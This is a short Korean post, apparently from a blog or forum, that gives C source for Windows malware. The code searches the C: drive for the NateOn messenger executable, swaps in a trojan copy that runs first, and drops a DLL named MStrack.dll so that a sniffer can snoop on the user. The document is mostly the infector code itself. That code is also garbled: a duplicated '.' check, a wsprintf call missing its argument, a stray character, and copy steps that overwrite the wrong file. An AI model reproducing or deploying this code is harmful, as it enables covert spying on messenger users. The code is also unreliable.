스누핑 프로그램 심기
/* 원본 네이트온 파일을 감염시켜 네이트온이 실행될때 먼저 실행된 후 복제된 네이트온 파일을 실행시켜 사용자를 속인다 */
#include <windows.h>
#define FILE_NAME "NateON.exe"
char szFilePath[MAX_PATH];
bool FindWantedFile( char* lpPath );
void InfestSniffer( char* lpPath );
int APIENTRY WinMain( HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow )
{
....GetCurrentDirectory( MAX_PATH, szFilePath );
....FindWantedFile( "C:" );
....return 0;
}
bool FindWantedFile( char* lpPath )
{
....HANDLE hSearch;
....WIN32_FIND_DATA ffd;
....SetCurrentDirectory( lpPath );
....
....hSearch = FindFirstFile( FILE_NAME, &ffd );
....if( INVALID_HANDLE_VALUE != hSearch )
....{
........InfestSniffer( lpPath );
........CloseHandle( hSearch );
........
........return true;
....}
....CloseHandle( hSearch );
....hSearch = FindFirstFile( "*", &ffd );
....
....if( INVALID_HANDLE_VALUE == hSearch )
........return false;
....do{
........if( ffd.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY )
........{
............if ( strcmp( ffd.cFileName, "." ) && strcmp ( ffd.cFileName, "." ) )
............{
................char szPath[ MAX_PATH ];
................wsprintf( szPath, "%s\\%s", lpPath, ffd.cFileName );
................if ( FindWantedFile ( szPath ) )
................{
....................CloseHandle( hSearch );
....................return true;
................}
............}
........}
....} while ( FindNextFile ( hSearch, &ffd ) );
....CloseHandle( hSearch );
....return false;
}
void InfestSniffer( char* lpPath )
{
....char szBuf1[MAX_PATH], szBuf2[MAX_PATH];
....
....// 원본 네이트온 파일을 nate.exe 파일로 교체
....wsprintf( szBuf1, "%s\\nate.exe", lpPath );
....wsprintf( szBuf2, "%s\\NateON.exe", lpPath );
....CopyFile( szBuf2, szBuf1, FALSE );
....
....// 감염시키기
ㅍ.wsprintf( szBuf1, "%s\\NateON.exe", szFilePath );
....wsprintf( szBuf2, "%s\\nate.exe", lpPath );
....CopyFile( szBuf1, szBuf2, FALSE );
...
....// Dll 복사하기
....wsprintf( szBuf1, "%s\\MStrack.dll", szFilePath );
....wsprintf( szBuf2, "%s\\MStrack.dll" );
....CopyFile( szBuf1, szBuf2, FALSE );
}